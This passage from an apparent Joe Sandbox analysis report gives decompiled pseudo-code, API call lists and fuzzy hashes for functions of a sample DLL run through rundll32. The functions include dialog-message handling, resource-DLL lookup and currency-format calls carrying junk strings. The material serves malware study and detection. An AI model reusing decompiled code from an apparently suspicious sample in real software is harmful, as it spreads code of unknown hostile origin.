				signed short* _v48;
				void _v52;
				void* _v56;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short _t33;
				signed short _t34;
				long _t42;
				intOrPtr _t48;
				signed int _t50;
				signed short _t55;
				signed short* _t58;
				signed short* _t60;
				signed short* _t62;
				long _t63;
				void* _t64;

				_t49 = __ecx;
				_t47 = __ebx;
				_t58 = _a4;
				_t55 = __ecx;
				_v12 = __ecx;
				_v8 = 1;
				if(_t58 == 0) {
					L18:
					E1000B21C(_t47, _t49,  *(_t55 + 0x20), 0x364, 0, 0, 0, 0);
					L19:
					return _v8;
				}
				_push(__ebx);
				_t48 = __imp__SendDlgItemMessageA; // 0x747647e0
				while(1) {
					_t33 =  *_t58 & 0x0000ffff;
					if(_t33 == 0) {
						break;
					}
					_t60 =  &(_t58[1]);
					_t49 = _t33 & 0x0000ffff;
					_t34 =  *_t60 & 0x0000ffff;
					_t62 =  &(_t60[1]);
					_t54 =  *_t62;
					_t63 =  &(_t62[2]);
					_v16 = _t49;
					_v20 =  *_t62;
					if(_t34 == 0x1234) {
						L9:
						_t50 = 8;
						memset( &_v52, 0, _t50 << 2);
						_t64 = _t64 + 0xc;
						_v52 = _v52 | 0xffffffff;
						_push(_t63);
						_v56 = 1;
						E1000563B(_t48,  &_a4,  &_v52 + _t50, _t63, __eflags);
						_v48 = _a4;
						_t42 = SendDlgItemMessageA( *(_v12 + 0x20), _v16 & 0x0000ffff, 0x401, 0,  &_v56);
						__eflags = _t42 - 0xffffffff;
						if(_t42 == 0xffffffff) {
							_t18 =  &_v8;
							 *_t18 = _v8 & 0x00000000;
							__eflags =  *_t18;
						}
						_t49 =  &(_a4[0xfffffffffffffff8]);
						E10001260( &(_a4[0xfffffffffffffff8]), _t54);
						_t55 = _v12;
						L16:
						_t58 = _t63 + _v20;
						if(_v8 != 0) {
							continue;
						}
						break;
					}
					if(_t34 != 0x401) {
						__eflags = _t34 - 0x403;
						if(_t34 == 0x403) {
							_t34 = 0x143;
						}
						__eflags = _t34 - 0x401;
						if(__eflags != 0) {
							__eflags = _t34 - 0x180;
							if(__eflags == 0) {
								L14:
								if(SendDlgItemMessageA( *(_t55 + 0x20), _t49 & 0x0000ffff, _t34 & 0x0000ffff, 0, _t63) == 0xffffffff) {
									_v8 = _v8 & 0x00000000;
								}
								goto L16;
							}
							__eflags = _t34 - 0x143;
							if(__eflags != 0) {
								goto L16;
							}
							goto L14;
						} else {
							goto L9;
						}
					}
					_t34 = 0x180;
					goto L14;
				}
				_pop(_t47);
				if(_v8 == 0) {
					goto L19;
				}
				goto L18;
			}
























                                                                                                            0x1000d09e
                                                                                                            0x1000d09e
                                                                                                            0x1000d0a5
                                                                                                            0x1000d0ab
                                                                                                            0x1000d0ad
                                                                                                            0x1000d0b0
                                                                                                            0x1000d0b7
                                                                                                            0x1000d197
                                                                                                            0x1000d1a5
                                                                                                            0x1000d1aa
                                                                                                            0x1000d1b0
                                                                                                            0x1000d1b0
                                                                                                            0x1000d0bd
                                                                                                            0x1000d0be
                                                                                                            0x1000d0c4
                                                                                                            0x1000d0c4
                                                                                                            0x1000d0ca
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000d0d1
                                                                                                            0x1000d0d2
                                                                                                            0x1000d0d5
                                                                                                            0x1000d0d9
                                                                                                            0x1000d0da
                                                                                                            0x1000d0dc
                                                                                                            0x1000d0e3
                                                                                                            0x1000d0e6
                                                                                                            0x1000d0e9
                                                                                                            0x1000d109
                                                                                                            0x1000d10b
                                                                                                            0x1000d111
                                                                                                            0x1000d111
                                                                                                            0x1000d113
                                                                                                            0x1000d117
                                                                                                            0x1000d11b
                                                                                                            0x1000d122
                                                                                                            0x1000d12a
                                                                                                            0x1000d143
                                                                                                            0x1000d145
                                                                                                            0x1000d148
                                                                                                            0x1000d14a
                                                                                                            0x1000d14a
                                                                                                            0x1000d14a
                                                                                                            0x1000d14a
                                                                                                            0x1000d151
                                                                                                            0x1000d154
                                                                                                            0x1000d159
                                                                                                            0x1000d183
                                                                                                            0x1000d183
                                                                                                            0x1000d18a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000d18a
                                                                                                            0x1000d0ef
                                                                                                            0x1000d0f8
                                                                                                            0x1000d0fc
                                                                                                            0x1000d0fe
                                                                                                            0x1000d0fe
                                                                                                            0x1000d103
                                                                                                            0x1000d107
                                                                                                            0x1000d15e
                                                                                                            0x1000d162
                                                                                                            0x1000d16a
                                                                                                            0x1000d17d
                                                                                                            0x1000d17f
                                                                                                            0x1000d17f
                                                                                                            0x00000000
                                                                                                            0x1000d17d
                                                                                                            0x1000d164
                                                                                                            0x1000d168
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000d107
                                                                                                            0x1000d0f1
                                                                                                            0x00000000
                                                                                                            0x1000d0f1
                                                                                                            0x1000d194
                                                                                                            0x1000d195
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • SendDlgItemMessageA.USER32(?,?,00000401,00000000,00000001), ref: 1000D143
                                                                                                            • SendDlgItemMessageA.USER32(?,?,?,00000000,?), ref: 1000D178
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ItemMessageSend
                                                                                                            • String ID: Gvt
                                                                                                            • API String ID: 3015471070-1887957350
                                                                                                            • Opcode ID: 21e00d9c98aae06fdbb049b67d99c5e766e824e01a2932572a527c6a446a0d19
                                                                                                            • Instruction ID: 6f657181b73039fc70753d9552d04d4c2f3caec7d0b9dc05c1bc994beffb3f4d
                                                                                                            • Opcode Fuzzy Hash: 21e00d9c98aae06fdbb049b67d99c5e766e824e01a2932572a527c6a446a0d19
                                                                                                            • Instruction Fuzzy Hash: F1317E75900129BBEB10EF58C840BFDB7F8EB043A0F604216F995A71D8CBB49E429764
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000D08D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 92%
                                                                                                            			E1000D08D(signed short __ecx, void* __eflags, signed short* _a4) {
				signed int _v8;
				signed short _v12;
				signed short _v16;
				signed short _v20;
				signed short* _v48;
				void _v52;
				void* _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short _t35;
				signed short _t36;
				long _t44;
				void* _t49;
				intOrPtr _t50;
				signed int _t52;
				signed short _t58;
				signed short* _t63;
				signed short* _t66;
				signed short* _t68;
				long _t69;
				void* _t73;
				void* _t74;

				_t51 = __ecx;
				E100113EF(1);
				E100209E8(0, 0);
				asm("int3");
				_t74 = _t73 - 0x34;
				_t63 = _a4;
				_t58 = _t51;
				_v12 = _t58;
				_v8 = 1;
				if(_t63 == 0) {
					L19:
					E1000B21C(_t49, _t51,  *(_t58 + 0x20), 0x364, 0, 0, 0, 0);
				} else {
					_push(_t49);
					_t50 = __imp__SendDlgItemMessageA; // 0x747647e0
					while(1) {
						_t35 =  *_t63 & 0x0000ffff;
						if(_t35 == 0) {
							break;
						}
						_t66 =  &(_t63[1]);
						_t51 = _t35 & 0x0000ffff;
						_t36 =  *_t66 & 0x0000ffff;
						_t68 =  &(_t66[1]);
						_t56 =  *_t68;
						_t69 =  &(_t68[2]);
						_v16 = _t51;
						_v20 =  *_t68;
						if(_t36 == 0x1234) {
							L10:
							_t52 = 8;
							memset( &_v52, 0, _t52 << 2);
							_t74 = _t74 + 0xc;
							_v52 = _v52 | 0xffffffff;
							_push(_t69);
							_v56 = 1;
							E1000563B(_t50,  &_a4,  &_v52 + _t52, _t69, __eflags);
							_v48 = _a4;
							_t44 = SendDlgItemMessageA( *(_v12 + 0x20), _v16 & 0x0000ffff, 0x401, 0,  &_v56);
							__eflags = _t44 - 0xffffffff;
							if(_t44 == 0xffffffff) {
								_t18 =  &_v8;
								 *_t18 = _v8 & 0x00000000;
								__eflags =  *_t18;
							}
							_t51 =  &(_a4[0xfffffffffffffff8]);
							E10001260( &(_a4[0xfffffffffffffff8]), _t56);
							_t58 = _v12;
						} else {
							if(_t36 != 0x401) {
								__eflags = _t36 - 0x403;
								if(_t36 == 0x403) {
									_t36 = 0x143;
								}
								__eflags = _t36 - 0x401;
								if(__eflags != 0) {
									__eflags = _t36 - 0x180;
									if(__eflags == 0) {
										goto L15;
									} else {
										__eflags = _t36 - 0x143;
										if(__eflags == 0) {
											goto L15;
										}
									}
								} else {
									goto L10;
								}
							} else {
								_t36 = 0x180;
								L15:
								if(SendDlgItemMessageA( *(_t58 + 0x20), _t51 & 0x0000ffff, _t36 & 0x0000ffff, 0, _t69) == 0xffffffff) {
									_v8 = _v8 & 0x00000000;
								}
							}
						}
						_t63 = _t69 + _v20;
						if(_v8 != 0) {
							continue;
						}
						break;
					}
					_pop(_t49);
					if(_v8 != 0) {
						goto L19;
					}
				}
				return _v8;
			}



























                                                                                                            0x1000d08d
                                                                                                            0x1000d08f
                                                                                                            0x1000d098
                                                                                                            0x1000d09d
                                                                                                            0x1000d0a1
                                                                                                            0x1000d0a5
                                                                                                            0x1000d0ab
                                                                                                            0x1000d0ad
                                                                                                            0x1000d0b0
                                                                                                            0x1000d0b7
                                                                                                            0x1000d197
                                                                                                            0x1000d1a5
                                                                                                            0x1000d0bd
                                                                                                            0x1000d0bd
                                                                                                            0x1000d0be
                                                                                                            0x1000d0c4
                                                                                                            0x1000d0c4
                                                                                                            0x1000d0ca
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000d0d1
                                                                                                            0x1000d0d2
                                                                                                            0x1000d0d5
                                                                                                            0x1000d0d9
                                                                                                            0x1000d0da
                                                                                                            0x1000d0dc
                                                                                                            0x1000d0e3
                                                                                                            0x1000d0e6
                                                                                                            0x1000d0e9
                                                                                                            0x1000d109
                                                                                                            0x1000d10b
                                                                                                            0x1000d111
                                                                                                            0x1000d111
                                                                                                            0x1000d113
                                                                                                            0x1000d117
                                                                                                            0x1000d11b
                                                                                                            0x1000d122
                                                                                                            0x1000d12a
                                                                                                            0x1000d143
                                                                                                            0x1000d145
                                                                                                            0x1000d148
                                                                                                            0x1000d14a
                                                                                                            0x1000d14a
                                                                                                            0x1000d14a
                                                                                                            0x1000d14a
                                                                                                            0x1000d151
                                                                                                            0x1000d154
                                                                                                            0x1000d159
                                                                                                            0x1000d0eb
                                                                                                            0x1000d0ef
                                                                                                            0x1000d0f8
                                                                                                            0x1000d0fc
                                                                                                            0x1000d0fe
                                                                                                            0x1000d0fe
                                                                                                            0x1000d103
                                                                                                            0x1000d107
                                                                                                            0x1000d15e
                                                                                                            0x1000d162
                                                                                                            0x00000000
                                                                                                            0x1000d164
                                                                                                            0x1000d164
                                                                                                            0x1000d168
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000d168
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000d0f1
                                                                                                            0x1000d0f1
                                                                                                            0x1000d16a
                                                                                                            0x1000d17d
                                                                                                            0x1000d17f
                                                                                                            0x1000d17f
                                                                                                            0x1000d17d
                                                                                                            0x1000d0ef
                                                                                                            0x1000d183
                                                                                                            0x1000d18a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000d18a
                                                                                                            0x1000d194
                                                                                                            0x1000d195
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000d195
                                                                                                            0x1000d1b0

                                                                                                            APIs
                                                                                                              • Part of subcall function 100113EF: LeaveCriticalSection.KERNEL32(?,1001068C,00000010,00000010,00000008,1000EC37,1000EBDA,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001,?,100101BD,00000000), ref: 10011406
                                                                                                            • __CxxThrowException@8.LIBCMT ref: 1000D098
                                                                                                              • Part of subcall function 100209E8: RaiseException.KERNEL32(1000511C,?,1000103F,8007000E,1000511C,?,1003E34C,00000004,1000103F,8007000E,100010E9), ref: 10020A28
                                                                                                            • SendDlgItemMessageA.USER32(?,?,00000401,00000000,00000001), ref: 1000D143
                                                                                                            • SendDlgItemMessageA.USER32(?,?,?,00000000,?), ref: 1000D178
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ItemMessageSend$CriticalExceptionException@8LeaveRaiseSectionThrow
                                                                                                            • String ID: Gvt
                                                                                                            • API String ID: 1466613979-1887957350
                                                                                                            • Opcode ID: fb879166e7deffb256b3134b359da8dd9ea36f46a71b4b84f91a4bb831ca918e
                                                                                                            • Instruction ID: f528238557d930c5b01bcb6272fa04cb0a70709c9dc2ae90bee456ea62ca2b20
                                                                                                            • Opcode Fuzzy Hash: fb879166e7deffb256b3134b359da8dd9ea36f46a71b4b84f91a4bb831ca918e
                                                                                                            • Instruction Fuzzy Hash: 82119D75900224BBFB10EB58CC40BFEB3E8EB047A1F204116FD95A71D4C6B49E4196A0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100061E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 76%
                                                                                                            			E100061E5(void* __ecx) {
				signed int _v8;
				char _v16;
				char _v18;
				char _v280;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				long _t14;
				intOrPtr _t15;
				char* _t18;
				intOrPtr _t21;
				intOrPtr _t33;
				signed int _t36;

				_t11 =  *0x10045580; // 0x6a53a566
				_v8 = _t11 ^ _t36;
				_t35 = 0x104;
				_t14 = GetModuleFileNameA( *(__ecx + 0x44),  &_v280, 0x104);
				if(_t14 == 0 || _t14 == 0x104) {
					L4:
					_t15 = 0;
					__eflags = 0;
				} else {
					_t18 = PathFindExtensionA( &_v280);
					_t35 = "%s.dll";
					asm("movsd");
					asm("movsw");
					_t32 =  &_v280;
					_t41 = _t18 -  &_v280 + 7 - 0x106;
					asm("movsb");
					_t33 = _t33;
					if(_t18 -  &_v280 + 7 > 0x106) {
						goto L4;
					} else {
						E10005C93(_t21,  &_v280, _t33, "%s.dll", _t36, _t18,  &_v18 - _t18,  &_v16);
						_t15 = E10005EFE(_t21,  &_v280, _t33, "%s.dll", _t41,  &_v280);
					}
				}
				return E1001FBB5(_t15, _t21, _v8 ^ _t36, _t32, _t33, _t35);
			}

















                                                                                                            0x100061ee
                                                                                                            0x100061f5
                                                                                                            0x100061fb
                                                                                                            0x1000620b
                                                                                                            0x10006213
                                                                                                            0x1000626a
                                                                                                            0x1000626a
                                                                                                            0x1000626a
                                                                                                            0x10006219
                                                                                                            0x10006221
                                                                                                            0x10006227
                                                                                                            0x1000622f
                                                                                                            0x10006230
                                                                                                            0x10006234
                                                                                                            0x1000623f
                                                                                                            0x10006245
                                                                                                            0x10006246
                                                                                                            0x10006247
                                                                                                            0x00000000
                                                                                                            0x10006249
                                                                                                            0x10006254
                                                                                                            0x10006263
                                                                                                            0x10006263
                                                                                                            0x10006247
                                                                                                            0x10006278

                                                                                                            APIs
                                                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 1000620B
                                                                                                            • PathFindExtensionA.SHLWAPI(?), ref: 10006221
                                                                                                              • Part of subcall function 10005C93: _strcpy_s.LIBCMT ref: 10005C9F
                                                                                                              • Part of subcall function 10005EFE: __EH_prolog3.LIBCMT ref: 10005F1D
                                                                                                              • Part of subcall function 10005EFE: GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10005F3E
                                                                                                              • Part of subcall function 10005EFE: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10005F4F
                                                                                                              • Part of subcall function 10005EFE: ConvertDefaultLocale.KERNEL32(?), ref: 10005F85
                                                                                                              • Part of subcall function 10005EFE: ConvertDefaultLocale.KERNEL32(?), ref: 10005F8D
                                                                                                              • Part of subcall function 10005EFE: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10005FA1
                                                                                                              • Part of subcall function 10005EFE: ConvertDefaultLocale.KERNEL32(?), ref: 10005FC5
                                                                                                              • Part of subcall function 10005EFE: ConvertDefaultLocale.KERNEL32(000003FF), ref: 10005FCB
                                                                                                              • Part of subcall function 10005EFE: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10006004
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3HandlePath_strcpy_s
                                                                                                            • String ID: %s.dll
                                                                                                            • API String ID: 3444012488-3668843792
                                                                                                            • Opcode ID: ac138f1077deb34d125d2171bae05d8dd1b3139321e2d582d898c2537ca73f46
                                                                                                            • Instruction ID: 87bbfe94c284bf79419f18a095101e7eadcc839ae2e31c05850216e2d59394d5
                                                                                                            • Opcode Fuzzy Hash: ac138f1077deb34d125d2171bae05d8dd1b3139321e2d582d898c2537ca73f46
                                                                                                            • Instruction Fuzzy Hash: A001F972A0051C6FEB19DB74CD569EE73B9EF08740F0101A9F502E7144EA71AE048751
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100014F4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E100014F4(void* __ecx) {
				intOrPtr _v8;
				intOrPtr _v12;

				_v12 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 + 0x30;
				_v8 =  *[fs:ebx];
				return _v8;
			}





                                                                                                            0x10001522
                                                                                                            0x1000152b
                                                                                                            0x10001533

                                                                                                            APIs
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001512
                                                                                                            Strings
                                                                                                            • eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 10001506
                                                                                                            • xadqsavcbdfewescGADW, xrefs: 100014FF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrencyFormat
                                                                                                            • String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
                                                                                                            • API String ID: 3383288267-3161301136
                                                                                                            • Opcode ID: 3037d2a31e13cd60ae94bf8572a488b6c64541d9a0000086c5ac0b5ac173194a
                                                                                                            • Instruction ID: 41eada4d2328894fcd37416b6f2f2abe75c7e90fa58e6643f2faad819eee2c9b
                                                                                                            • Opcode Fuzzy Hash: 3037d2a31e13cd60ae94bf8572a488b6c64541d9a0000086c5ac0b5ac173194a
                                                                                                            • Instruction Fuzzy Hash: 42E0B6B5A50208BFE705CB88DDD6FCABBB8EB09705F114055F705EB691D3B0AA508A64
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10001DE9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 15COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10001DE9(void* __esi, intOrPtr _a4) {

				return GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc +  !(__esi - 1) & _a4 + __esi - 0x00000001;
			}



                                                                                                            0x10001e1f

                                                                                                            APIs
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001E01
                                                                                                            Strings
                                                                                                            • eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 10001DF5
                                                                                                            • xadqsavcbdfewescGADW, xrefs: 10001DEE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrencyFormat
                                                                                                            • String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
                                                                                                            • API String ID: 3383288267-3161301136
                                                                                                            • Opcode ID: 24238ad2289803ca50e9d90b58c44b5b7125c6c52a1704e1df8113e70dde896a
                                                                                                            • Instruction ID: a6bb75da600a1c00fcd3d833fe1878cb6779512402ee289b34badc6351d60fc0
                                                                                                            • Opcode Fuzzy Hash: 24238ad2289803ca50e9d90b58c44b5b7125c6c52a1704e1df8113e70dde896a
                                                                                                            • Instruction Fuzzy Hash: 83D09E75388202AEF619C740CD97FD5B754A755706F11800CF346EE5D1CBA651558B14
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10001DB6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10001DB6(signed int _a4, intOrPtr _a8) {

				return GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 +  !(_a8 - 1) & _a4;
			}



                                                                                                            0x10001de8

                                                                                                            APIs
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001DCE
                                                                                                            Strings
                                                                                                            • eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 10001DC2
                                                                                                            • xadqsavcbdfewescGADW, xrefs: 10001DBB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrencyFormat
                                                                                                            • String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
                                                                                                            • API String ID: 3383288267-3161301136
                                                                                                            • Opcode ID: 0603a27c0e74e74ad8478d6043813fb474373adc01802646cc0a30f63cb7563e
                                                                                                            • Instruction ID: 693cd55018ed01a535ded29b615326f2d298561c8c1b69a974d3bac9f79f4422
